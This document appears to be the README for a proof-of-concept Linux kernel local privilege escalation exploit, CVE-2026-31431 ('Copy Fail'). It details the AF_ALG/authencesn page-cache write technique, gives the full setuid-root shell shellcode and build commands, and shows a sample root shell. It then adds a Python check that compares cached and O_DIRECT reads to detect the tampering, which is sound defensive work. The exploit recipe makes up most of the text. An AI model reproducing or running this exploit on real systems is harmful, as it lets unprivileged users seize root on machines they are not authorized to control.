Local privilege escalation exploit for CVE-2026-31431 (Copy Fail), a logic bug in the Linux kernel's authencesn cryptographic template that allows an unprivileged local user to perform a controlled 4-byte write into the page cache of any readable file.
- ELF parsing — resolves `/usr/bin/su`'s entry point virtual address to a file offset via `PT_LOAD` program headers
- AF_ALG setup — binds to `authencesn(hmac(sha256),cbc(aes))` with a zero key
- 4-byte page cache writes — for each chunk of the shellcode payload:
  - `sendmsg()` sends AAD with the shellcode bytes as `seqno_lo` (bytes 4-7), with `MSG_MORE`
  - `splice()` delivers 32 bytes of the target file's page cache pages as the AEAD authentication tag
  - `recv()` triggers decryption — `authencesn`'s scratch write lands in the chained page cache pages, writing 4 controlled bytes. The HMAC verification fails (`EBADMSG`) but the write persists
- Privilege escalation — `execl("/usr/bin/su")` loads the corrupted page cache. The 40-byte shellcode (`setuid(0)` + `execve("/bin/sh")`) runs as setuid-root:
```asm
xor edi, edi          ; uid = 0
mov eax, 105          ; sys_setuid
syscall
xor edx, edx          ; envp = NULL
push rdx              ; null terminator
movabs rax, "/bin/sh" ; "/bin/sh\0"
push rax
mov rdi, rsp          ; filename
push rdx              ; NULL (argv[1])
push rdi              ; argv[0]
mov rsi, rsp          ; argv
mov eax, 59           ; sys_execve
syscall
```

Requires musl-gcc or any C compiler with static linking support:
```sh
musl-gcc -static -O2 -s -o copyfail exploit.c
```

Alternatively with GCC + glibc:

```sh
gcc -static -O2 -s -o copyfail exploit.c
```

```console
$ ./copyfail
[*] CVE-2026-31431 PoC (Copy Fail)
[*] /usr/bin/su entry @ file offset 0x78
[*] Patching page cache (40 bytes, 10 writes)
..........
[+] Executing /usr/bin/su
# id
uid=0(root) gid=1000(user) groups=1000(user)
```

- Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
- Fix commit a664bf3d
- Introduced by commit 72548b093ee3 (2017)
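A defender-side integrity check, added here and not part of the exploit or the original write-up: because the 4-byte write described above lands only in the page cache and is never written back to disk, reading the same file with `O_DIRECT` (which bypasses the page cache) still returns the on-disk bytes, and any mismatch pinpoints page-cache-only tampering. It assumes the filesystem supports `O_DIRECT` (tmpfs and some overlay setups return `EINVAL`) and that the corrupted pages were not dirtied, so a direct read is not preceded by a writeback of the tampered data.

```python
import mmap
import os
import sys

BLOCK = 4096  # O_DIRECT needs block-aligned buffer, offset and length; 4096 covers common disks

def read_direct(path):
    """Read `path` from the backing store, bypassing the page cache (EINVAL if unsupported)."""
    size = os.path.getsize(path)
    fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    try:
        buf = mmap.mmap(-1, BLOCK)  # anonymous mmap is page-aligned, as O_DIRECT requires
        out = bytearray()
        while len(out) < size:
            n = os.readv(fd, [buf])  # aligned read of one block; short read only at EOF
            if n == 0:
                break
            out += buf[:n]
        return bytes(out[:size])
    finally:
        os.close(fd)

def read_cached(path):
    """Ordinary read, served from the page cache when the file is resident."""
    with open(path, "rb") as f:
        return f.read()

def diff_ranges(cached, direct):
    """Return (file_offset, cached_bytes, disk_bytes) for each maximal run where the two differ."""
    runs, start = [], None
    end = max(len(cached), len(direct))
    for i in range(end + 1):  # one extra step so a run reaching EOF is flushed
        same = i == end or (i < len(cached) and i < len(direct) and cached[i] == direct[i])
        if not same and start is None:
            start = i
        elif same and start is not None:
            runs.append((start, cached[start:i], direct[start:i]))
            start = None
    return runs

def check_binary(path):
    """Empty list means page cache and disk agree; each tuple is a page-cache-only discrepancy."""
    return diff_ranges(read_cached(path), read_direct(path))

if __name__ == "__main__":
    for p in sys.argv[1:] or ["/usr/bin/su"]:
        for off, cached, disk in check_binary(p):
            print(f"{p}: page cache differs from disk at {off:#x}: {cached.hex()} vs {disk.hex()}")
```

Run it against the setuid binaries on a host you suspect; a reboot or a drop of the page cache makes the discrepancy disappear, so collect the output before either.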
This proof-of-concept is provided for authorized security research and educational purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.